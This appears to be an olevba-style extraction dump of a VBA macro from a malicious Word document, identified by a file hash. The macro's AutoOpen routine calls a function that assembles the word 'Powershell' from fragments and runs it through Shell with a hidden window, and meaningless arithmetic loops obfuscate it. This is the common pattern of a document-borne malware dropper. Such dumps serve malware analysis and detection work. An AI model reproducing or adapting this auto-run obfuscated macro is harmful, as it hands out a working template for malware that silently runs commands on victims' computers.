Filename     : ./macros/b72843106ae8e78c0f64b596fb02b8c26f2df6cd4a321ebc1597ab648910599e
OLE stream   : Macros/VBA/WUCIwnEjsG
VBA filename : WUCIwnEjsG.cls
----------------------------------------
Attribute VB_Name = "WUCIwnEjsG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fEzGijUY()
On Error Resume Next
For iasiDO = GKJoXf To DiucEw
      For FKMfF = wWscPl To 25355
         ZhXHlK = (39474 / CBool(KFnjmz) - kXHQN / Oct(48088 / Hex(30587) / zzhbkS + Rnd(YmRGdB / Fix(37))))
Next
   VTowQ = 99225 - 12672
Next
For VuAHHE = VzSJB To JDikX
      For hBSfUN = CobRI To 31362
         Hcnbc = (19680 / CBool(RRSoUA) - LQFLsW / Oct(49114 / Hex(81611) / PjtuC + Rnd(tiJtb / Fix(37))))
Next
   hPHHN = 359 - 30367
Next
fEzGijUY = UIjab + Shell(jfcnSnj + Chr(YRGKwNnUpO + vbKeyP + ptNPRPMEi) + "owers" + jXoNWXMJ + BiwmJuhnZwj + tSAXBiinn + GMiFFDU + QMlAsO + SpDwaBPlQ, 28692 - 28692)
For zqAMNq = WFPtz To ZYuiP
      For wYkiaZ = iAwEfW To 18754
         DYjhj = (22163 / CBool(Xctzbw) - rMYzZ / Oct(33929 / Hex(22038) / MZniM + Rnd(YBkXq / Fix(37))))
Next
   WzOBi = 28868 - 6107
Next
End Function
Sub Autoopen()
On Error Resume Next
For Hlbzl = Ilfhw To voMGtC
      For XzbJbl = lrzXOK To 27829
         Hbzqt = (80549 / CBool(mVCaz) - hnHHj / Oct(30965 / Hex(61632) / jbzLz + Rnd(QnITld / Fix(37))))
Next
   jlIDJJ = 15061 - 23931
Next
fEzGijUY
For GAnYD = qPiui To bzwiw
      For wwNjp = iBCwD To 45159
         YpaVw = (45950 / CBool(hMzsk) - vcElKZ / Oct(25139 / Hex(8286) / NsWLT + Rnd(CBrLKn / Fix(37))))
Next
   TBizG = 44875 - 44640
Next
End Sub

